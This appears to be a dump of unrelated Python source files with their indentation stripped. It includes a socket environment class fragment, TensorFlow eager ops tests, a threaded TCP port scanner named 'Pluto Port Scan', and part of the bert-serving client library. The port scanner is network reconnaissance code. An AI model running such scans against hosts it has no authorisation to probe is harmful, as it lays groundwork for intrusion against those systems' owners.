self.soc.sendall(data_out)
def disconnect(self):
""" Disconnect everything.
"""
if self.proc:
self.proc.kill()
if self.soc:
self.soc.close()
self.connected = False
def _close(self):
""" Close subprocess, socket and logfile.
"""
logger.debug('close')
if self.proc:
self.proc.kill()
if self.soc:
self.soc.close()
if self.logfile:
self.logfile.close()
def _render(self, mode='human', *args, **kwargs):
pass
def memory_usage(pid):
proc = psutil.Process(pid)
mem = proc.memory_info().rss #resident memory
for child in proc.children(recursive=True):
try:
mem += child.memory_info().rss
except psutil.NoSuchProcess:
pass
return mem
def get_free_port(host):
"""As the name indicates, get a port.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, 0))
port = sock.getsockname()[1]
sock.close()
return port
|
ops_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for operations in eager execution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import weakref
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.eager import execute
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import sparse_ops
class OpsTest(test_util.TensorFlowTestCase):
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
@test_util.run_gpu_only
def testMatMulGPU(self):
with context.device(test_util.gpu_device_type()):
three = constant_op.constant([[3.]])
five = constant_op.constant([[5.]])
product = math_ops.matmul(three, five)
self.assertEqual([[15.0]], product.numpy())
def testExecuteStringAttr(self):
three = constant_op.constant(3.0)
checked_three = array_ops.check_numerics(three,
message='just checking')
self.assertEqual([[3]], checked_three.numpy())
def testExecuteFloatAttr(self):
three = constant_op.constant(3.0)
almost_three = constant_op.constant(2.8)
almost_equal = math_ops.approximate_equal(
three, almost_three, tolerance=0.3)
self.assertTrue(almost_equal)
def testExecuteIntAttr(self):
three = constant_op.constant(3)
four = constant_op.constant(4)
total = math_ops.add_n([three, four])
self.assertAllEqual(7, total)
def testExecuteBoolAttr(self):
three = constant_op.constant([[3]])
five = constant_op.constant([[5]])
product = math_ops.matmul(three, five, transpose_a=True)
self.assertAllEqual([[15]], product)
def testExecuteOneListOutput(self):
split_dim = constant_op.constant(1)
value = constant_op.constant([[0, 1, 2], [3, 4, 5]])
x1, x2, x3 = array_ops.split(value, 3, axis=split_dim)
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testGraphMode(self):
graph = ops.Graph()
with graph.as_default(), context.graph_mode():
array_ops.placeholder(dtypes.int32)
self.assertEqual(1, len(graph.get_operations()))
# See comments on handling of int32 tensors on GPU in
# EagerTensor.__init__.
@test_util.run_gpu_only
def testInt32CPUDefault(self):
with context.device('/gpu:0'):
r = constant_op.constant(1) + constant_op.constant(2)
self.assertAllEqual(r, 3)
def testExecuteListOutputLen1(self):
split_dim = constant_op.constant(1)
value = constant_op.constant([[0, 1, 2], [3, 4, 5]])
result = array_ops.split(value, 1, axis=split_dim)
self.assertTrue(isinstance(result, list))
self.assertEqual(1, len(result))
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], result[0])
def testExecuteListOutputLen0(self):
empty = constant_op.constant([], dtype=dtypes.int32)
result = array_ops.unstack(empty, 0)
self.assertTrue(isinstance(result, list))
self.assertEqual(0, len(result))
def testExecuteMultipleNonListOutput(self):
x = constant_op.constant([1, 2, 3, 4, 5, 6])
y = constant_op.constant([1, 3, 5])
result = array_ops.listdiff(x, y)
out, idx = result
self.assertTrue(out is result.out)
self.assertTrue(idx is result.idx)
self.assertAllEqual([2, 4, 6], out)
self.assertAllEqual([1, 3, 5], idx)
def testExecuteMultipleListOutput(self):
split_dim = constant_op.constant(1, dtype=dtypes.int64)
indices = constant_op.constant([[0, 2], [0, 4], [0, 5], [1, 0], [1, 1]],
dtype=dtypes.int64)
values = constant_op.constant([2, 3, 5, 7, 11])
shape = constant_op.constant([2, 7], dtype=dtypes.int64)
result = sparse_ops.gen_sparse_ops.sparse_split(
split_dim,
indices,
values,
shape,
num_split=2)
output_indices, output_values, output_shape = result
self.assertEqual(2, len(output_indices))
self.assertEqual(2, len(output_values))
self.assertEqual(2, len(output_shape))
self.assertEqual(output_indices, result.output_indices)
self.assertEqual(output_values, result.output_values)
self.assertEqual(output_shape, result.output_shape)
self.assertAllEqual([[0, 2], [1, 0], [1, 1]], output_indices[0])
self.assertAllEqual([[0, 0], [0, 1]], output_indices[1])
self.assertAllEqual([2, 7, 11], output_values[0])
self.assertAllEqual([3, 5], output_values[1])
self.assertAllEqual([2, 4], output_shape[0])
self.assertAllEqual([2, 3], output_shape[1])
# TODO(josh11b): Test an op that has multiple outputs, some but not
# all of which are lists. Examples: barrier_take_many (currently
# unsupported since it uses a type list) or sdca_optimizer (I don't
# have an example of legal inputs & outputs).
def testComposition(self):
x = constant_op.constant(1, dtype=dtypes.int32)
three_x = x + x + x
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
def testOperatorOverrides(self):
def ops_test(v1, v2):
a = constant_op.constant(v1)
b = constant_op.constant(v2)
self.assertAllEqual((-a), np.negative(v1))
self.assertAllEqual(abs(b), np.absolute(v2))
self.assertAllEqual((a + b), np.add(v1, v2))
self.assertAllEqual((a - b), np.subtract(v1, v2))
self.assertAllEqual((a * b), np.multiply(v1, v2))
self.assertAllEqual((a * a), np.multiply(v1, v1))
if all(x >= 0 for x in v2):
self.assertAllEqual((a**b), np.power(v1, v2))
self.assertAllEqual((a / b), np.true_divide(v1, v2))
self.assertAllEqual((a / a), np.true_divide(v1, v1))
self.assertAllEqual((a % b), np.mod(v1, v2))
self.assertAllEqual((a < b), np.less(v1, v2))
self.assertAllEqual((a <= b), np.less_equal(v1, v2))
self.assertAllEqual((a > b), np.greater(v1, v2))
self.assertAllEqual((a >= b), np.greater_equal(v1, v2))
# TODO(b/120678848): Remove the else branch once we enable
# ops.Tensor._USE_EQUALITY by default.
if ops.Tensor._USE_EQUALITY:
self.assertAllEqual((a == b), np.equal(v1, v2))
self.assertAllEqual((a != b), np.not_equal(v1, v2))
else:
self.assertAllEqual((a == b), np.equal(v1, v2)[0])
self.assertAllEqual((a != b), np.not_equal(v1, v2)[0])
self.assertAllEqual(v1[0], a[constant_op.constant(0)])
ops_test([1, 4, 8], [2, 3, 5])
ops_test([1, -4, -5], [-2, 3, -6])
def test_basic_slice(self):
npt = np.arange(1, 19, dtype=np.float32).reshape(3, 2, 3)
t = constant_op.constant(npt)
self.assertAllEqual(npt[:, :, :], t[:, :, :])
self.assertAllEqual(npt[::, ::, ::], t[::, ::, ::])
self.assertAllEqual(npt[::1, ::1, ::1], t[::1, ::1, ::1])
self.assertAllEqual(npt[::1, ::5, ::2], t[::1, ::5, ::2])
self.assertAllEqual(npt[::-1, :, :], t[::-1, :, :])
self.assertAllEqual(npt[:, ::-1, :], t[:, ::-1, :])
self.assertAllEqual(npt[:, :, ::-1], t[:, :, ::-1])
self.assertAllEqual(npt[-2::-1, :, ::1], t[-2::-1, :, ::1])
self.assertAllEqual(npt[-2::-1, :, ::2], t[-2::-1, :, ::2])
def testDegenerateSlices(self):
npt = np.arange(1, 19, dtype=np.float32).reshape(3, 2, 3)
t = constant_op.constant(npt)
# degenerate by offering a forward interval with a negative stride
self.assertAllEqual(npt[0:-1:-1, :, :], t[0:-1:-1, :, :])
# degenerate with a reverse interval with a positive stride
self.assertAllEqual(npt[-1:0, :, :], t[-1:0, :, :])
# empty interval in every dimension
self.assertAllEqual(npt[-1:0, 2:2, 2:3:-1], t[-1:0, 2:2, 2:3:-1])
def testEllipsis(self):
npt = np.array(
[[[[[1, 2], [3, 4], [5, 6]]], [[[7, 8], [9, 10], [11, 12]]]]])
t = constant_op.constant(npt)
self.assertAllEqual(npt[0:], t[0:])
# implicit ellipsis
self.assertAllEqual(npt[0:, ...], t[0:, ...])
# ellipsis alone
self.assertAllEqual(npt[...], t[...])
# ellipsis at end
self.assertAllEqual(npt[0:1, ...], t[0:1, ...])
# ellipsis at begin
self.assertAllEqual(npt[..., 0:1], t[..., 0:1])
# ellipsis at middle
self.assertAllEqual(npt[0:1, ..., 0:1], t[0:1, ..., 0:1])
def testShrink(self):
npt = np.array([[[[[1, 2, 4, 5], [5, 6, 7, 8], [9, 10, 11, 12]]],
[[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]]])
t = constant_op.constant(npt)
self.assertAllEqual(npt[:, :, :, :, 3], t[:, :, :, :, 3])
self.assertAllEqual(npt[..., 3], t[..., 3])
self.assertAllEqual(npt[:, 0], t[:, 0])
self.assertAllEqual(npt[:, :, 0], t[:, :, 0])
@test_util.run_gpu_only
def testOpWithInputsOnDifferentDevices(self):
# The GPU kernel for the Reshape op requires that the
# shape input be on CPU.
with context.device(test_util.gpu_device_type()):
value = constant_op.constant([1., 2.])
shape = constant_op.constant([2, 1])
reshaped = array_ops.reshape(value, shape)
self.assertAllEqual([[1], [2]], reshaped.cpu())
def testInt64(self):
# Fill requires the first input to be an int32 tensor.
self.assertAllEqual(
[1.0, 1.0],
array_ops.fill(constant_op.constant([2], dtype=dtypes.int64),
constant_op.constant(1)))
@test_util.run_gpu_only
def testOutputOnHostMemory(self):
# The Shape op kernel on GPU places the output in host memory.
with context.device(test_util.gpu_device_type()):
value = constant_op.constant([1.])
shape = array_ops.shape(value)
self.assertEqual([1], shape.numpy())
@test_util.run_gpu_only
def testSilentCopy(self):
# Temporarily replace the context
# pylint: disable=protected-access
old_context = context.context()
context._set_context(context.Context())
try:
config.set_device_policy('silent')
cpu_tensor = constant_op.constant(1.0)
with context.device(test_util.gpu_device_type()):
gpu_tensor = array_ops.identity(cpu_tensor)
self.assertAllEqual(cpu_tensor + gpu_tensor, 2.0)
finally:
context._set_context(old_context)
# pylint: enable=protected-access
@test_util.run_gpu_only
def testSoftPlacement(self):
# Temporarily replace the context
# pylint: disable=protected-access
old_context = context.context()
context._set_context(context.Context())
try:
config.set_device_policy('silent')
config.set_soft_device_placement(True)
cpu_tensor = constant_op.constant(1.0)
result = cpu_tensor + cpu_tensor
expected_device = '/job:localhost/replica:0/task:0/device:%s:0' % test_util.gpu_device_type()
self.assertEqual(result.device, expected_device)
finally:
context._set_context(old_context)
# pylint: enable=protected-access
def testRandomUniform(self):
scalar_shape = constant_op.constant([], dtype=dtypes.int32)
x = random_ops.random_uniform(scalar_shape)
self.assertEquals(0, x.shape.ndims)
self.assertEquals(dtypes.float32, x.dtype)
x = random_ops.random_uniform(
scalar_shape, minval=constant_op.constant(5.),
maxval=constant_op.constant(6.))
self.assertLess(x, 6)
self.assertGreaterEqual(x, 5)
def testArgsToMatchingEagerDefault(self):
# Uses default
ctx = context.context()
t, r = execute.args_to_matching_eager([[3, 4]], ctx, dtypes.int32)
self.assertEquals(t, dtypes.int32)
self.assertEquals(r[0].dtype, dtypes.int32)
t, r = execute.args_to_matching_eager([[3, 4]], ctx, dtypes.int64)
self.assertEquals(t, dtypes.int64)
self.assertEquals(r[0].dtype, dtypes.int64)
# Doesn't use default
t, r = execute.args_to_matching_eager(
[['string', 'arg']], ctx, dtypes.int32)
self.assertEquals(t, dtypes.string)
self.assertEquals(r[0].dtype, dtypes.string)
def testFlattenLayer(self):
flatten_layer = core.Flatten()
x = constant_op.constant([[[-10, -20], [-30, -40]], [[10, 20], [30, 40]]])
y = flatten_layer(x)
self.assertAllEqual([[-10, -20, -30, -40], [10, 20, 30, 40]], y)
def testIdentity(self):
self.assertAllEqual(2, array_ops.identity(2))
@test_util.run_gpu_only
def testIdentityOnVariable(self):
with context.device(test_util.gpu_device_name()):
v = resource_variable_ops.ResourceVariable(True)
self.assertAllEqual(True, array_ops.identity(v))
def testIncompatibleSetShape(self):
x = constant_op.constant(1)
with self.assertRaises(ValueError):
x.set_shape((1, 2))
def testCompatibleSetShape(self):
x = constant_op.constant([[1, 2]])
x.set_shape(tensor_shape.TensorShape([None, 2]))
self.assertEqual(x.get_shape(), (1, 2))
def testCastScalarToPrimitiveTypes(self):
x = constant_op.constant(1.3)
self.assertIsInstance(int(x), int)
self.assertEqual(int(x), 1)
self.assertIsInstance(float(x), float)
self.assertAllClose(float(x), 1.3)
def testCastNonScalarToPrimitiveTypesFails(self):
x = constant_op.constant([1.3, 2])
with self.assertRaises(TypeError):
int(x)
with self.assertRaises(TypeError):
float(x)
def testRange(self):
x = constant_op.constant(2)
self.assertEqual([0, 1], list(range(x)))
def testFormatString(self):
x = constant_op.constant(3.1415)
self.assertEqual('3.14', '{:.2f}'.format(x))
def testNoOpIsNone(self):
self.assertTrue(control_flow_ops.no_op() is None)
def testEagerContextPreservedAcrossThreads(self):
def init_fn():
self.assertTrue(context.executing_eagerly())
with ops.init_scope():
self.assertTrue(context.executing_eagerly())
context_switches = context.context().context_switches
self.assertEqual(len(context_switches.stack), 1)
self.assertFalse(context_switches.stack[0].is_building_function)
self.assertEqual(context_switches.stack[0].enter_context_fn,
context.eager_mode)
self.assertTrue(context.executing_eagerly())
t1 = threading.Thread(target=init_fn)
t1.start()
t1.join()
def testWeakrefEagerTensor(self):
x = constant_op.constant([[1.]])
x.at1 = constant_op.constant([[2.]])
x.at2 = 3.
weak_x = weakref.ref(x)
weak_xat1 = weakref.ref(x.at1)
del x
self.assertIs(weak_x(), None)
self.assertIs(weak_xat1(), None)
def testWeakKeyDictionaryTensor(self):
weak_key_dict = weakref.WeakKeyDictionary()
strong_x = constant_op.constant([[1.]])
strong_y = constant_op.constant([[2.]])
strong_x_ref = strong_x.experimental_ref()
strong_y_ref = strong_y.experimental_ref()
weak_key_dict[strong_x_ref] = constant_op.constant([[3.]])
weak_key_dict[strong_y_ref] = constant_op.constant([[4.]])
strong_y.a = constant_op.constant([[5.]])
weak_x_ref = weakref.ref(strong_x)
del strong_x, strong_x_ref
self.assertIs(weak_x_ref(), None)
self.assertEqual([strong_y_ref], list(weak_key_dict))
self.assertEqual(1, len(list(weak_key_dict)))
self.assertEqual(1, len(weak_key_dict))
del strong_y, strong_y_ref
self.assertEqual([], list(weak_key_dict))
def testEagerTensorsCanBeGarbageCollected(self):
x = constant_op.constant([[1.]])
y = constant_op.constant([[2.]])
x.y = y
y.x = x
weak_x = weakref.ref(x)
weak_y = weakref.ref(y)
del x
del y
gc.collect()
self.assertIs(weak_x(), None)
self.assertIs(weak_y(), None)
if __name__ == '__main__':
test.main()
|
Pluto_Port_Scan.py
|
#
#Python 3 File
#
# BSD 3-Clause License
# Copyright (c) 2019, Dominik Lothmann All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice, this list of conditions and
# the following disclaimer in the documentation and/or other materials provided with the distribution.
# Neither the name of the copyright holder nor the names of its contributors may be used to endorse or
# promote products derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import socket
import sys
import threading
import argparse
#
#Author is Dominik Lothmann
#https://github.com/dlothmann
#Project Pluto
#
print(' _____ _ _ _____ _ _____')
print('| __ \| | | | | __ \ | | / ____|')
print('| |__) | |_ _| |_ ___ | |__) |__ _ __| |_ | (___ ___ __ _ _ __')
print('| ___/| | | | | __/ _ \ | ___/ _ \| \'__| __| \___ \ / __/ _` | \'_ \\')
print('| | | | |_| | || (_) | | | | (_) | | | |_ ____) | (_| (_| | | | |')
print('|_| |_|\__,_|\__\___/ |_| \___/|_| \__| |_____/ \___\__,_|_| |_|')
print()
print()
# Command Line Options definition
parser = argparse.ArgumentParser(description='Arguments for this program.')
parser.add_argument('-H','--Host', metavar='', required=True, help='Host address to scan')
parser.add_argument('-p1','--port1',type=int, metavar='', required=True, help='Start port. If only this is given, only this port is scanned.')
parser.add_argument('-p2','--port2',type=int, metavar='',help='End port')
group = parser.add_mutually_exclusive_group()
group.add_argument('-a', '--all', action='store_true', help='Shows closed AND open Ports.')
args = parser.parse_args()
#Take Command Line Options to Variables
arg1 = args.Host
arg2 = args.port1
arg3 = args.port2
url = arg1
#Scan only the start port when no end port is given (set the end port equal to the start port).
if arg3 is None:
arg3 = arg2
#Exit when the end port is smaller than the start port
if arg3 < arg2:
print("Wrong Input. Please Check with -h")
sys.exit()
#Resolve the host name or URL (arg1) to an IP address
IP = socket.gethostbyname(url)
#Set the Start Port of the Scan, the end port of the scan and the max port number
startPort = arg2
endPort = arg3
maxPort = 65535
threads = []
oPorts = []
cPorts = []
#Check whether a port is open and record it in the list oPorts or cPorts
def check(item):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)  # do not hang indefinitely on filtered ports
    result = s.connect_ex((IP, item))
    s.close()  # release the socket once the check is done
    if result == 0:
        oPorts.append(item)
    else:
        cPorts.append(item)
#Print all Open Ports
def printOpen():
print("Open Ports")
if len(oPorts) != 0:
print("|",end="")
else:
print("---",end="")
for i in oPorts:
print("{}|".format(i),end="")
print()
#Print all Closed Ports
def printClosed():
print("Closed Ports")
if len(cPorts) != 0:
print("|",end="")
else:
print("---",end="")
for i in cPorts:
print("{}|".format(i),end="")
try:
#check if ports are ok for scanning
    if endPort <= maxPort and startPort >= 0:
#create for every portcheck a thread
for port in range(startPort,endPort+1):
process = threading.Thread(target=check,name=port,args=[port])
process.start()
threads.append(process)
        #wait for every thread to finish its check
for process in threads:
process.join()
#Print the result of the check
if args.all:
printOpen()
printClosed()
elif len(oPorts) != 0:
printOpen()
else:
print("No host online or no open port in this port Range")
sys.exit()
#Port not in Range
else:
print("Port not in Range 0 - 65535")
sys.exit()
except KeyboardInterrupt:
print ("You pressed Ctrl+C")
sys.exit()
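# Example invocations (illustrative only; the hosts below are placeholders):
#   python Pluto_Port_Scan.py -H 192.168.0.1 -p1 80              # scan a single port
#   python Pluto_Port_Scan.py -H example.org -p1 20 -p2 443      # scan a port range
#   python Pluto_Port_Scan.py -H example.org -p1 1 -p2 1024 -a   # also list closed ports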
|
__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <artex.xh@gmail.com> <https://hanxiao.github.io>
import sys
import threading
import time
import uuid
import warnings
from collections import namedtuple
from functools import wraps
import numpy as np
import zmq
from zmq.utils import jsonapi
__all__ = ['__version__', 'BertClient', 'ConcurrentBertClient']
# in the future client version must match with server version
__version__ = '1.9.2'
if sys.version_info >= (3, 0):
from ._py3_var import *
else:
from ._py2_var import *
_Response = namedtuple('_Response', ['id', 'content'])
Response = namedtuple('Response', ['id', 'embedding', 'tokens'])
class BertClient(object):
def __init__(self, ip='localhost', port=5555, port_out=5556,
output_fmt='ndarray', show_server_config=False,
identity=None, check_version=True, check_length=True,
check_token_info=True, ignore_all_checks=False,
timeout=-1):
""" A client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `ignore_all_checks=True`
You can also use it as a context manager:
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
bc.encode(...)
# bc is automatically closed out of the context
:type timeout: int
:type check_version: bool
:type check_length: bool
:type check_token_info: bool
:type ignore_all_checks: bool
:type identity: str
:type show_server_config: bool
:type output_fmt: str
:type port_out: int
:type port: int
:type ip: str
:param ip: the ip address of the server
:param port: port for pushing data from client to server, must be consistent with the server side config
:param port_out: port for publishing results from server to client, must be consistent with the server side config
        :param output_fmt: the output format of the sentence encodings, either a numpy array or a python List[List[float]] (ndarray/list)
:param show_server_config: whether to show server configs when first connected
:param identity: the UUID of this client
:param check_version: check if server has the same version as client, raise AttributeError if not the same
:param check_length: check if server `max_seq_len` is less than the sentence length before sent
:param check_token_info: check if server can return tokenization
:param ignore_all_checks: ignore all checks, set it to True if you are not sure whether the server is ready when constructing BertClient()
:param timeout: set the timeout (milliseconds) for receive operation on the client, -1 means no timeout and wait until result returns
"""
self.context = zmq.Context()
self.sender = self.context.socket(zmq.PUSH)
self.sender.setsockopt(zmq.LINGER, 0)
self.identity = identity or str(uuid.uuid4()).encode('ascii')
self.sender.connect('tcp://%s:%d' % (ip, port))
self.receiver = self.context.socket(zmq.SUB)
self.receiver.setsockopt(zmq.LINGER, 0)
self.receiver.setsockopt(zmq.SUBSCRIBE, self.identity)
self.receiver.connect('tcp://%s:%d' % (ip, port_out))
self.request_id = 0
self.timeout = timeout
self.pending_request = set()
self.pending_response = {}
if output_fmt == 'ndarray':
self.formatter = lambda x: x
elif output_fmt == 'list':
self.formatter = lambda x: x.tolist()
else:
raise AttributeError('"output_fmt" must be "ndarray" or "list"')
self.output_fmt = output_fmt
self.port = port
self.port_out = port_out
self.ip = ip
self.length_limit = 0
self.token_info_available = False
if not ignore_all_checks and (check_version or show_server_config or check_length or check_token_info):
s_status = self.server_config
if check_version and s_status['server_version'] != self.status['client_version']:
raise AttributeError('version mismatch! server version is %s but client version is %s!\n'
'consider "pip install -U bert-serving-server bert-serving-client"\n'
'or disable version-check by "BertClient(check_version=False)"' % (
s_status['server_version'], self.status['client_version']))
if check_length:
if s_status['max_seq_len'] is not None:
self.length_limit = int(s_status['max_seq_len'])
else:
self.length_limit = None
if check_token_info:
self.token_info_available = bool(s_status['show_tokens_to_client'])
if show_server_config:
self._print_dict(s_status, 'server config:')
def close(self):
"""
Gently close all connections of the client. If you are using BertClient as context manager,
then this is not necessary.
"""
self.sender.close()
self.receiver.close()
self.context.term()
def _send(self, msg, msg_len=0):
self.request_id += 1
self.sender.send_multipart([self.identity, msg, b'%d' % self.request_id, b'%d' % msg_len])
self.pending_request.add(self.request_id)
return self.request_id
def _recv(self, wait_for_req_id=None):
try:
while True:
# a request has been returned and found in pending_response
if wait_for_req_id in self.pending_response:
response = self.pending_response.pop(wait_for_req_id)
return _Response(wait_for_req_id, response)
# receive a response
response = self.receiver.recv_multipart()
request_id = int(response[-1])
# if not wait for particular response then simply return
if not wait_for_req_id or (wait_for_req_id == request_id):
self.pending_request.remove(request_id)
return _Response(request_id, response)
elif wait_for_req_id != request_id:
self.pending_response[request_id] = response
# wait for the next response
except Exception as e:
raise e
finally:
if wait_for_req_id in self.pending_request:
self.pending_request.remove(wait_for_req_id)
def _recv_ndarray(self, wait_for_req_id=None):
request_id, response = self._recv(wait_for_req_id)
arr_info, arr_val = jsonapi.loads(response[1]), response[2]
X = np.frombuffer(_buffer(arr_val), dtype=str(arr_info['dtype']))
return Response(request_id, self.formatter(X.reshape(arr_info['shape'])), arr_info.get('tokens', ''))
@property
def status(self):
"""
Get the status of this BertClient instance
:rtype: dict[str, str]
:return: a dictionary contains the status of this BertClient instance
"""
return {
'identity': self.identity,
'num_request': self.request_id,
'num_pending_request': len(self.pending_request),
'pending_request': self.pending_request,
'output_fmt': self.output_fmt,
'port': self.port,
'port_out': self.port_out,
'server_ip': self.ip,
'client_version': __version__,
'timeout': self.timeout
}
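    # Decorator: applies the client-side receive timeout to the wrapped call and
    # converts zmq's "resource temporarily unavailable" error into a TimeoutError
    # with a more actionable message.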
def _timeout(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
if 'blocking' in kwargs and not kwargs['blocking']:
# override client timeout setting if `func` is called in non-blocking way
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
else:
self.receiver.setsockopt(zmq.RCVTIMEO, self.timeout)
try:
return func(self, *args, **kwargs)
except zmq.error.Again as _e:
t_e = TimeoutError(
'no response from the server (with "timeout"=%d ms), please check the following:'
'is the server still online? is the network broken? are "port" and "port_out" correct? '
'are you encoding a huge amount of data whereas the timeout is too small for that?' % self.timeout)
if _py2:
raise t_e
else:
_raise(t_e, _e)
finally:
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
return arg_wrapper
@property
@_timeout
def server_config(self):
"""
Get the current configuration of the server connected to this client
:return: a dictionary contains the current configuration of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_CONFIG')
return jsonapi.loads(self._recv(req_id).content[1])
@property
@_timeout
def server_status(self):
"""
Get the current status of the server connected to this client
:return: a dictionary contains the current status of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_STATUS')
return jsonapi.loads(self._recv(req_id).content[1])
@_timeout
def encode(self, texts, blocking=True, is_tokenized=False, show_tokens=False):
""" Encode a list of strings to a list of vectors
`texts` should be a list of strings, each of which represents a sentence.
If `is_tokenized` is set to True, then `texts` should be list[list[str]],
outer list represents sentence and inner list represent tokens in the sentence.
Note that if `blocking` is set to False, then you need to fetch the result manually afterwards.
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
# encode untokenized sentences
bc.encode(['First do it',
'then do it right',
'then do it better'])
# encode tokenized sentences
bc.encode([['First', 'do', 'it'],
['then', 'do', 'it', 'right'],
['then', 'do', 'it', 'better']], is_tokenized=True)
:type is_tokenized: bool
:type show_tokens: bool
:type blocking: bool
        :type timeout: int
:type texts: list[str] or list[list[str]]
:param is_tokenized: whether the input texts is already tokenized
:param show_tokens: whether to include tokenization result from the server. If true, the return of the function will be a tuple
        :param texts: list of sentences to be encoded; a larger list gives better efficiency
:param blocking: wait until the encoded result is returned from the server. If false, will immediately return.
:param timeout: throw a timeout error when the encoding takes longer than the predefined timeout.
:return: encoded sentence/token-level embeddings, rows correspond to sentences
:rtype: numpy.ndarray or list[list[float]]
"""
if is_tokenized:
self._check_input_lst_lst_str(texts)
else:
self._check_input_lst_str(texts)
if self.length_limit is None:
warnings.warn('server does not put a restriction on "max_seq_len", '
'it will determine "max_seq_len" dynamically according to the sequences in the batch. '
'you can restrict the sequence length on the client side for better efficiency')
elif self.length_limit and not self._check_length(texts, self.length_limit, is_tokenized):
warnings.warn('some of your sentences have more tokens than "max_seq_len=%d" set on the server, '
'as consequence you may get less-accurate or truncated embeddings.\n'
'here is what you can do:\n'
                          '- disable the length-check by creating a new "BertClient(check_length=False)" '
'when you do not want to display this warning\n'
'- or, start a new server with a larger "max_seq_len"' % self.length_limit)
req_id = self._send(jsonapi.dumps(texts), len(texts))
if not blocking:
return None
r = self._recv_ndarray(req_id)
if self.token_info_available and show_tokens:
return r.embedding, r.tokens
elif not self.token_info_available and show_tokens:
warnings.warn('"show_tokens=True", but the server does not support showing tokenization info to clients.\n'
'here is what you can do:\n'
'- start a new server with "bert-serving-start -show_tokens_to_client ..."\n'
'- or, use "encode(show_tokens=False)"')
return r.embedding
def fetch(self, delay=.0):
""" Fetch the encoded vectors from server, use it with `encode(blocking=False)`
        Use it after `encode(texts, blocking=False)`. If there are no pending requests, it will return None.
Note that `fetch()` does not preserve the order of the requests! Say you have two non-blocking requests,
        R1 and R2, where R1 has 256 samples and R2 has 1 sample. It could be that R2 returns first.
To fetch all results in the original sending order, please use `fetch_all(sort=True)`
:type delay: float
:param delay: delay in seconds and then run fetcher
:return: a generator that yields request id and encoded vector in a tuple, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
time.sleep(delay)
while self.pending_request:
yield self._recv_ndarray()
def fetch_all(self, sort=True, concat=False):
""" Fetch all encoded vectors from server, use it with `encode(blocking=False)`
        Use it after `encode(texts, blocking=False)`. If there are no pending requests, it will return None.
:type sort: bool
:type concat: bool
:param sort: sort results by their request ids. It should be True if you want to preserve the sending order
:param concat: concatenate all results into one ndarray
:return: encoded sentence/token-level embeddings in sending order
:rtype: numpy.ndarray or list[list[float]]
"""
if self.pending_request:
tmp = list(self.fetch())
if sort:
tmp = sorted(tmp, key=lambda v: v.id)
tmp = [v.embedding for v in tmp]
if concat:
if self.output_fmt == 'ndarray':
tmp = np.concatenate(tmp, axis=0)
elif self.output_fmt == 'list':
tmp = [vv for v in tmp for vv in v]
return tmp
def encode_async(self, batch_generator, max_num_batch=None, delay=0.1, **kwargs):
""" Async encode batches from a generator
:param delay: delay in seconds and then run fetcher
:param batch_generator: a generator that yields list[str] or list[list[str]] (for `is_tokenized=True`) every time
:param max_num_batch: stop after encoding this number of batches
:param `**kwargs`: the rest parameters please refer to `encode()`
